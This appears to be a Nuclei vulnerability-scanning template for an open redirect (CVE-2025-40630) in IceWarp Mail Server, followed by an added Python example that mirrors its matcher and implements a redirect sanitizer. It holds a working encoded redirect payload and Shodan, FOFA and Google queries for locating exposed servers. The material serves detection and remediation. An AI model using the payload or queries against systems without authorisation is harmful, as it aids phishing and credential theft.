Vulnerability description
IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability (CWE-601) that lets an attacker send users to an arbitrary external domain through a crafted URL. The template below issues a single GET for `/%2f%5c%2foast.pro%2f..`, which decodes to `//\/oast.pro/..`; browsers normalize the backslash to a slash and treat the result as a scheme-relative URL for `oast.pro`, so a `302` whose `Location` header points at `oast.pro` confirms the redirect. Note that the matcher only looks for the literal `oast.pro` string, so the regex must be adjusted if a different callback host is substituted in the path.
id: CVE-2025-40630

info:
  name: IceWarp Mail Server ≤11.4.0 - Open Redirect
  author: DhiyaneshDK
  severity: medium
  description: |
    IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability that allows attackers to redirect users to arbitrary external domains through malicious URLs.
  impact: |
    An attacker can craft malicious URLs to redirect users to external malicious websites, potentially leading to phishing attacks or credential theft.
  remediation: |
    Update IceWarp Mail Server to a version newer than 11.4.0. Implement proper URL validation and restrict redirects to trusted domains only.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40630
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-icewarp-mail-server
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-40630
    cwe-id: CWE-601
    epss-score: 0.00275
    epss-percentile: 0.50703
    cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: icewarp
    product: mail_server
    shodan-query: 'http.title:"IceWarp"'
    fofa-query: 'title="IceWarp"'
    google-query: intitle:"icewarp"
  tags: cve,cve2025,icewarp,redirect,open-redirect

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2f%5c%2foast.pro%2f.."

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'

      - type: status
        status:
          - 302
# digest: 4a0a004730450221008a0306ca1feb4159d34ea21ab1cb2d88ff9c66069d6cad7f44361fa97d45664b0220273ca74ab115ac7371381bb3f978a68067d801954fa860d334ccb7ae4cafedc5:922c64590222798bb761d5b6d8e72950
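The following Python is an added example, not IceWarp code and not part of the Nuclei template. It does two things: `check_response` applies the template's two matchers (the `Location` regex and the `302` status, combined with `and`) to a raw HTTP response, so you can see exactly what the template accepts; `safe_redirect` is one way to implement the remediation advice ("restrict redirects to trusted domains only") and shows why the `/%2f%5c%2f` payload must be rejected. The response text `SAMPLE_RESPONSE` is constructed, not a capture from a real server, and `APP_ORIGIN` is an assumed origin for the application being protected.

```python
"""Added example: replicate the template's matcher and show a redirect-target
sanitizer that refuses the backslash / scheme-relative tricks the payload uses."""
import re
from urllib.parse import unquote, urlsplit, urljoin, urlunsplit

# Same expression as the template's header matcher ((?m) == re.MULTILINE).
LOCATION_RE = re.compile(
    r"(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$"
)


def matches_template(status_line: str, headers: str) -> bool:
    """Both template matchers must hit (matchers-condition: and)."""
    status_ok = status_line.split()[1] == "302"
    return status_ok and LOCATION_RE.search(headers) is not None


def check_response(raw: str) -> bool:
    """Split a raw HTTP response into status line / headers and run the matchers."""
    head, _, _body = raw.partition("\r\n\r\n")
    status_line, _, headers = head.partition("\r\n")
    return matches_template(status_line, headers)


# Constructed response (not a real IceWarp capture): what a vulnerable server
# would send back for the payload /%2f%5c%2foast.pro%2f.. once it decodes the path.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: //oast.pro/..\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

APP_ORIGIN = "https://mail.example.com"  # assumed origin of the protected application


def safe_redirect(target: str, origin: str = APP_ORIGIN):
    """Return an absolute same-origin URL for `target`, or None if it must be refused.

    The server should emit the returned absolute URL rather than the raw input,
    which removes any browser-side ambiguity about how the value is resolved.
    """
    decoded = target
    for _ in range(3):  # undo double-encoding such as %252f before inspecting
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if any(ord(c) < 0x20 for c in decoded):  # CR/LF/TAB would allow header injection
        return None
    # Browsers treat '\' as '/' in http(s) URLs, so '/\host' == '//host' (network-path).
    normalized = decoded.replace("\\", "/")
    if not normalized.startswith("/") or normalized.startswith("//"):
        return None
    parts = urlsplit(normalized)
    if parts.scheme or parts.netloc:  # e.g. javascript:, https://, or a sneaked-in host
        return None
    resolved = urlsplit(urljoin(origin + "/", normalized))
    o = urlsplit(origin)
    if (resolved.scheme, resolved.netloc) != (o.scheme, o.netloc):
        return None
    return urlunsplit(resolved)


if __name__ == "__main__":
    print("template would match sample:", check_response(SAMPLE_RESPONSE))
    for t in ("/webmail/", "/%2f%5c%2foast.pro%2f..", "//oast.pro/", "https://oast.pro/"):
        print(f"{t!r:32} -> {safe_redirect(t)!r}")
```

`safe_redirect` deliberately accepts only absolute-path references (`/path?query`); if the application needs to redirect to another trusted host, add an explicit allow-list check on `resolved.netloc` instead of loosening the leading-slash rule, since that rule is what defeats `//host`, `/\host` and their percent-encoded variants.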